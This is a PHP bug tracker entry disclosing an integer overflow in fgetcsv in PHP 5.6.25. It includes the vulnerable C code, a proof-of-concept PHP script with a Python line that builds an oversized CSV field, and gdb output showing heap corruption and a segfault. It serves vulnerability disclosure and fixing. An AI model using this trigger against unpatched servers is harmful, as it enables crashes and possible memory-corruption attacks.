|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-09-12 03:56 UTC] stas@php.net
[2016-09-12 03:59 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-09-13 04:11 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-09-13 04:11 UTC] stas@php.net
[2017-02-13 01:24 UTC] stas@php.net
-Type: Security
+Type: Bug
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Mon Apr 07 12:01:29 2025 UTC |
Description: ------------ The fgetcsv function will read file and parse it as csv. But if has has a csv field with length, it'll cause integer overflow and will lead to heap corruption: PHPAPI void php_fgetcsv(php_stream *stream, char delimiter, char enclosure, char escape_char, size_t buf_len, char *buf, zval *return_value TSRMLS_DC) /* {{{ */ { char *temp, *tptr, *bptr, *line_end, *limit; size_t temp_len, line_end_len; int inc_len; zend_bool first_field = 1; ... temp_len = buf_len; temp = emalloc(temp_len + line_end_len + 1); //this value here will be overflow integer /* Initialize return array */ array_init(return_value); Test script: --------------- <?php ini_set('memory_limit', -1); $handle = fopen("/opt/lampp/htdocs/a", "r"); /*use python to create this file: >>> f = open("/opt/lampp/htdocs/a", 'w') >>> f.write("a,"+"A"*(0xffffffff/2+1000)) >>> f.close() */ $str1 = fgetcsv($handle); var_dump(strlen($str1[1])); chunk_split($str1[1], 11, $str1[1]); ?> Expected result: ---------------- No crash Actual result: -------------- Starting program: /home/minhrau/PHP-5.6.25/sapi/cli/php ~/phptestcase/testfgetcsv.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". Breakpoint 1, php_fgetcsv (stream=0x7ffff7fa1190, delimiter=44 ',', enclosure=34 '"', escape_char=92 '\\', buf_len=2147484649, buf=0x7ffef0726030 "a,", 'A' <repeats 198 times>..., return_value=0x7ffff7fa0018) at /home/minhrau/PHP-5.6.25/ext/standard/file.c:2072 2072 temp = emalloc(temp_len + line_end_len + 1); (gdb) p temp_len + line_end_len + 1 $1 = 2147484650 (gdb)c int(-2147482649) Program received signal SIGSEGV, Segmentation fault. 0x00007ffff11ff9a4 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6 (gdb)